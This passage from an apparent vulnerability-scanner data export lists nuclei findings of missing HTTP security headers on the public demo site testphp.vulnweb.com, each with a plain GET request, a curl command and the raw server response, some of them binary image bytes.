#&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001c\u0001\u0004\u0003\u0001\u0001\u0002\u0003\u0004\u0005\u0006\u0007\b��2\u0010\u0002\u0001\u0003\u0003\u0003\u0003\u0003\u0003\u0003\u0004\u0003\u0001\u0002\u0003\u0004\u0011\u0005\u0012!\u00061A\u0013"Q\u00142a\u0007q�\u0015B�\b\u0016#3C����\u001b\u0001\u0001\u0005\u0001\u0001\u0002\u0003\u0005\u0006\u0007\u0001\u0004��2\u0011\u0001\u0003\u0003\u0002\u0003\u0005\u0007\u0004\u0003\u0001\u0002\u0003\u0004\u00111\u0005!\u0012\u0013A\u0014Qaq�\u0006"#����2���3R���\f\u0003\u0001\u0002\u0011\u0003\u0011?��W�z�M.�wow\n�C$\u0012��\u001b�2\t�\u0004\u001f��V���\u0013u\u001b;6���Ŏp6�I�l<����I$�\r���xU�/E�]���\u001b\u0018\u0002�\u0010I�8\u0002�_A��\u001f\t;7�^�J��\u0013^\u0006��MB��N�M�]�k\u001b0Ei�\b\u0019���54R$��\u001c�b��\u001c�����V�}���&�ng�\u001at���\u0010�V^�\u001eB7���܌��\u000b�д\u000bk\u0013!���#\u001a��\u001f��\u0017�\u0018��@\u001cq��x��C��2Xn����^W��9��,\u001a=J�\r\u0015��[�V��N�n./u\u0012�\\Or-�F���\u000b�\t����v\u001cg<F*\u0012��JYLR\rǟ�KST����E\u0014Q^e��c\f\u001aJy\u0019�+�\\�t8&�JF)+�h��(B(��\u0010�F))�)���M�QE\u0014%-#���<u|�q��,�\u000e\u0016(W�.�� �(9��!N\f̀�\u001d\u0002H����1��#��j�]��6\u001a��픆+�w\u0012D�\u0003�����G��u=\u000b�r�!D�4��p�5�\r��\n6����\u000eq��\u0003�6��h���ψq\u001e�\u001f�UA�k�J8/a��wS�6�\u0010�\u0015\u0002M�㴞\b����|V\u0011\u0014*\r�\u0011K���Υ�b�\u001a�����\u0015\u001c"�\u001c��\u0005\u0001�)9�\u0004\u00023��\u0003Vnt����,��\u0018\f�,�����\b����;�T\u0018#4�\u0003��$_��Lj�s\u001fτ�\u0003�5F�e}^�錛�˹Q�ܟݸn\\�2pI�\u000e\u0018��p�A\u001bD�$c+�\u001bP�\u000e�r�}�ی�2@�+E�X��l��I$�\\͈�1�\u0018.�\u0005���\u001cs�c\u0007�n�\u001f�\u0012K�Y�\u0017��\u000eO�6\u0001 \u0012pH\u001cx�5\u0013�hkj�����^�\u0003�і4�T��\u0019쥺{�B[�=�<\n\u0010 �\u001d�m9ov�y�\u0003�;�[Qm+�fԯ`\u0002HmIJB�\u0002\u0015����\u0001��8���\u00157�w���RH�/��nTz��\t��;C�\u000f\u0019\u0007;\\�����Ҽ��29\u0006H\u001bm�:)��{\u0014%�w��4\u000f�{�R�K\u001b�)R{���KA��y\u0019U)�� n%�p2ɮ���4gP�@%Cn�|���s\u001e���=\u0002���L�wH���\u0005Q���B�\u001carX�[�\u0018�^X�Z��\u000fy�R���n\u001e�\nѤ��$3����.s�d`�\r�U�\u0004��\u0011�1����\u000b�|�T\r\u000e���#��zӲ��dRm��-. �����x�`q��7WW�\u0019\u0004py�KTw���\u0015k�^&�\u0014dc�\u0015!\u0019�L#\u0014�\u0013�u�QE\u0015ĤS[�:���Rٔ�QEq8��\u0010x�>�\u0016ݣv{�J����wY\u000b��E@op\u0007\u001f4G4��,���J����YO��G�J�u1�p�\u0016�������:�]Һ��P����+i\u000b<\u0013�;�\u0002\n����c������2\u000b��m6+�\u0016�\u0019��\u0006H��2�\u0006�\u0002�\u0005H�H'#\f8��f�w��t���t�7���`��Z\u0003�����x\u0004�\f�q���ƈ+�|f�\u001e�R��@w����>$�2����h��P\u0010v��\u00078� \u000e\u000f\u001c5c���x`\u0019&\u0017b_�y \f\u00021�ry>\u0006\u0001���L~�麪J���:X��\u0018�2����l(,s�q��8�ߤ���^�]\t��\u0005e�\u0010\u0006��;�a�\u001d��L��g\u0015V��梮��45����c�u3Y<U\u0014�\u0010�\\G��(��\u0004S.S�v�)]�8?�T���U��6�g;U\u0007���\u0007�p+Ch?��eN�͂�z\\[\u000b\tV�=1\u0011f!��\u0018݁��+��O\u0003�\u0006Z����els\u001cq�����}�\u0003\u0005����\u0005\fFv��S�\u001dr�D��9��k���O\u0004!w˳n�\u0016*�\u0001��\u001d��\u0003�U5�uN�6�&�B�{i�h���e)\u0018dS��\u001e\t\u0019�\u00185\u001eA\u001b/{\\\u000e�EE<�0�\u001aE��������Er�a�$�\u0018���.�\u0015��(��u�$`\r7a��B\u0001MU\u0002�{=-�}�5^�q�(\\7)�3Y�#�5-\u001e?B�oRɑ����z���I]��;�v���TG����9��#A\u001e)��|f�6+���z]�\u0015�ݴ��͆��FSϴ��mĀ�\n\u0014}ÀvΐV��$��E��\b\u001d�d�z{�l0���A�\u0018\r��+�S�\u0015���̈:;U�\u0018��o�C\u001e��\fH\u0014�9�nq��\u001a��\\�Z\u0007�<c�\u001f\u001f�{�c\u0012�\u001er�\u001d�P�@��E\u001c��+�W�k�^?\u0004\u000f��S��M�\u00078=����Hc�y�� S#���\t��o�{)$g `�dR�-��b\u0002��\u001d(!^��L�\\�Z\u0005����J�,ņ\u0006;\fg����ߨ�a��ԗ\u001af�,Q�X��n�\u0004�%�9\u0019V�;�3�\u001cv[�k\u000b)�YA�����A�\u0019��\u000f��\u0016��\u001a���s~>�c{q$�4r\b�"�IȐ�<�Kc䚶�3Hǽ�5\r\u0016h�����Z�Ao���[WGu����jVs�(�}5�.^\u0010�\u00138bQ@]ː9<�}�kg�\u001f\u0007k.@8a�23��kJ�.��Ӭn.���P��E\n�\u001cl�\u0018����p�x>�ʫ)\u0015�A\u001b��Y$���Ycm�c�\u0018\\|g�{��Q��Բ�YL�X��\u0002�w/~�\u001c��:glz}n��\u0014����eWJ�n�\u0014QE\tK��S�?�\u001e���e��2�~����~(E�h��w���Tl�⤢�\u0003eRH�v��@�\u0004�3�\t<e~���W\b��vn\u0018n\u0001�y ��\u0012��G\u0016��)�6ޙ �������3\u001b��?\u0014�7\u0002\u0017�l��Դ�.QU��E�#�~8#8$g���ޑ-�^��Kp���aLͱG~\u0013;s�8�'�q\\�􃨮.\u0012]\u001a�帒\u0012\u001a\u0007 �H�\u0014�\u0003\u0001U��'�'\u001c\fV��j����Z��%\t\u001eb�Uf�;\u0010�X/%w0�9�k*�����4;���\u0015ޒx*!�:�\u0019X�n�^�%�\u0001�0�F�I��\u0018��8 \u001c��d2�\u0007���ŧY�a�8�t��Q\u0019db��\u0018��I\u0018�rN1��V8�\u0015�QD�Jv���\u001fUI������D�K[�qf���*�m\u0004�\u0019�?8�#=�Z����.��I�C��b��\u001c[��#ö<n\bW�\u0005��8 �9��6IP�\t���yq\u001c��7PA��=��\u0015�0 1�+s��2\u0006pO��*�9.����d��=R�d<��\\��\u001f��l���\u000f�ț,\be�q�8$v�<g�\u0017�y���M�ҭ�./�`N@P\u0019�\u0004�\u00120q�ۃ�v\u0016\u001b�"��Ťv2q���ѩ��\u001eI(��ez\u0017������F�(��$�(?ju\u0015�ۨ�~iʠS��Ⱥ\u0001 �RJŁ&��v���\u0005\u0001:\u000b��+������>U���ߐFA\u001eA"��D�V}C���\u0005\f���wo'��\u0019'i�T��|�������\u001c�CE֯�[�u�ʊ���H�ш�q�\u0016\\�\u001c3\f�j\u001fX�;|<,6p�|���ON���]���Wf�ڰ.�Vu \u0015�\u0006\u0016@G�9<\u001e���\u001d�����Giz�Ŕ:��ۥ���T��h��z��\u0006=�vFs�r\t�4�s^�7��Ý�\u0011�FW��>T�\ft�V$��O�[����\u0013\bcc#M\u0004�\u0019W����Gܮ\u001c��\n~r(i��jw\u0006\u0018Z<�/���F��x\u0007\u0004�b21��m�u�XZ�*�Fھ��ҰEM��$*������c���D}��RzE\u0003��H���a��\u001a�{�0���s����2�(��ך�\u00063ڢ����F�(��"�(�\b��(Bl�mEE\u0015Ġ�\u0006�'=袄���\u000e�w�j�wd�:�Y\u0018e%O(�ʜv�\u00020@5�:�6WWqDIX����q�E\u0015�n�\u0007����x�ߴ�+m6��e\nč#;rX�\u001e�I$��w�\u0006�\\0\u0017�7��U\u0003\r\u0018\u000b��\u0011��9\u0018�\u0004w�<`��Ⱦ$�/����*�rțö>�W��\u0013�O.�=�П�.�\u0004\u0001��c�Y!\n��Wv�v�\u0019e\u0007�\u0015��f��ӧ��mn����B������8ݑ�؁��<`��(�:��\u000f�L�Od�����1��igw|��)��\u0004��\u00078����;�98�@�E\u0015\u0017�1���E�\u001f`�����\u0002�}���", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 888, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-3/3L", + "discovered_date": "2024-11-13T02:42:19.621Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-3/3L HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Laser Color Printer HP LaserJet M551dn, A4</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 889, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/Details/web-camera-a4tech/2", + "discovered_date": "2024-11-13T02:42:19.811Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/Details/web-camera-a4tech/2 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.0 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 890, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-2/3", + "discovered_date": "2024-11-13T02:42:20.008Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /Mod_Rewrite_Shop/BuyProduct-2/3 HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<div>Thanks for buying <b> Web Camera A4Tech PK-335E</b><br><br></div>\r\n\t\t\t\t", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 891, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testphp.vulnweb.com/cgi-bin'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/cgi-bin", + "discovered_date": "2024-11-13T02:42:20.207Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /cgi-bin HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=iso-8859-1\r\nDate: Wed, 13 Nov 2024 02:41:39 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>403 Forbidden</title>\n</head><body>\n<h1>Forbidden</h1>\n<p>You don't have permission to access this resource.</p>\n<hr>\n<address>Apache/2.4.46 (Ubuntu) Server at localhost Port 8000</address>\n</body></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 892, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62' 'http://testphp.vulnweb.com/_mmServerScripts'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/_mmServerScripts", + "discovered_date": "2024-11-13T02:42:20.436Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /_mmServerScripts HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Edg/92.0.902.62\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:33 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /_mmServerScripts/</title></head>\r\n<body>\r\n<h1>Index of /_mmServerScripts/</h1><hr><pre><a href="../">../</a>\r\n<a href="MMHTTPDB.php">MMHTTPDB.php</a> 11-May-2011 10:27 2111\r\n<a href="mysql.php">mysql.php</a> 11-May-2011 10:27 10634\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 893, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/pictures/2.jpg.tn", + "discovered_date": "2024-11-13T02:42:20.634Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /pictures/2.jpg.tn HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 1353\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:41:42 GMT\r\nEtag: "4dca64a1-549"\r\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\r\nServer: nginx/1.19.0\r\n\r\n����\u0010JFIF\u0001\u0001\u0001\u0001��C\u0006\u0004\u0005\u0006\u0005\u0004\u0006\u0006\u0005\u0006\u0007\u0007\u0006\b\n\u0010\n\n\t\t\n\u0014\u000e\u000f\f\u0010\u0017\u0014\u0018\u0018\u0017\u0014\u0016\u0016\u001a\u001d%\u001f\u001a\u001b#\u001c\u0016\u0016 , #&')*)\u0019\u001f-0-(0%()(��C\u0001\u0007\u0007\u0007\n\b\n\u0013\n\n\u0013(\u001a\u0016\u001a((((((((((((((((((((((((((((((((((((((((((((((((((��\u0011\bd�\u0003\u0001"\u0002\u0011\u0001\u0003\u0011\u0001��\u001a\u0002\u0003\u0001\u0001\u0002\u0001\u0003\u0004\u0005\u0006��+\u0010\u0002\u0002\u0001\u0004\u0002\u0002\u0004\u0007\u0001\u0002\u0011\u0003\u0004\u0012!1AQ"a\u00142q�\u0005\u0013$B�����\u001b\u0001\u0002\u0003\u0001\u0001\u0001\u0003\u0001\u0002\u0004\u0005\u0006\u0007��'\u0011\u0002\u0002\u0001\u0004\u0002\u0002\u0001\u0005\u0001\u0001\u0002\u0011\u0003\u0004\u0012!1\u0005Q\u00132A"#3aq���\f\u0003\u0001\u0002\u0011\u0003\u0011?���d�H䏺JU�\t\u000f\b�i{\u0015+f�.7<������B6�˨����͒\u001bdס\u001a�i�E�n�_��%\u001atN\f�pR�H\u001d�,֝�\u0001 \u0014@'DQ\u0003Qu?b�-\u0010\u0005�L\t-\u0005�\u0001��\fH�'A\u0015F�\u001a�ʔ?z3G�^�|����b�#����K�)�ۓ�l�%��"䨤�\u001f�u\u0015Ed44�2\u0005�S�D\u0002Y\u0005F�`H\u0001\r\u0011L`"�)4(\fF�,�����\u0003%C�9��1F�$�c$��\u000f�~�Q_�ק{c'K�#��r|�R��(�Ԥ�I}#;��k�ʚ��ϳf���EmZ\u0010��\u0012Kȶ�А��C\u0001Z\u001a�B�\u0006Ҵ1I\n\u0004�X�\u001com�\u0004�,�7\u000e�}�\\1�,�\u001f\u0017��#�wG�ϫ�\u0016���dPf�<\u0013�K��G�4j��\u001c�i�$���a���j�4C\u000b���g�8�`�.�Μy)�N��?��j��\u001a�*�w\u0016�����),\u0012�5b����/�g%��[7e�b�\u001a�/�$�fiƎ֛3�����Х�5b�ޥ�@%Ţ\b\u0019v\u0014E\u0012M�(�\u0018\b�w1h��(���\u001e\u001a7��C\u001c���_�\f{,��َ[]��kp��p}\u001d?ĹI��'�&�jq���0����WO����kV���}\u001bq�|�c]�q5\u0018��p\u0013�J�3��]Fhe�\u0018��K�4�%r}��W��à��d�h�}��-�\\��\u001c�E��+B�+^�4j��\u0004\u0010�}�\u0004\fN�qb�Qe?e`6�\u001b~Ȣې�6߲v��܄&��\u0014C��J�x�\n>njlԑ��5CEY�3��j=�\nʱ��եj�б�N����f�p���k3��Ҿ�9���}3t���ψ�2J4�N\rvt���O��\u0018��>�q�%��\t��\u001fB��e�\u001bJ�\u001e�QM"(�»^,]�e\\FG2k�WAC�\r��.�bPQf���t[^\tP��Σ�(���\u00126�6�YlJ&���I\u0013D<���d\u0017 \u0006��p2�\u000e��m%\u000e6���uc���V��}��\u001dl*⏝y�J\u0019�K�Nn�N\u0012x�䋤rr%`\u0006-W���\u0013���Ed(�\u0003!�����P�8��k��\u0005)�?,+���;5\u0012�\f2���+��\u0004��e�2�\t7�6-"v�\u0001f�d�&ͺXA���Sh~�\\�W���%O��r��c\u0014�\u0004>Ό\u001b�CHe\u0014\b��\u0007��", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 894, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36' 'http://testphp.vulnweb.com/login'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/login", + "discovered_date": "2024-11-13T02:42:20.831Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /login HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 404 Not Found\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>404 Not Found</title></head>\r\n<body>\r\n<center><h1>404 Not Found</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n<!-- a padding to disable MSIE and Chrome friendly error page -->\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 895, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50' 'http://testphp.vulnweb.com/hpp'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/hpp", + "discovered_date": "2024-11-13T02:42:21.039Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /hpp HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.80 Safari/537.36 Edg/98.0.1108.50\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html; charset=UTF-8\r\nDate: Wed, 13 Nov 2024 02:41:40 GMT\r\nServer: nginx/1.19.0\r\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\r\n\r\n<title>HTTP Parameter Pollution Example</title>\r\n\r\n<a href="?pp=12">check</a><br/>\r\n\r\n<hr>\r\n<a href='http://blog.mindedsecurity.com/2009/05/client-side-http-parameter-pollution.html'>Original article</a>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 896, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + 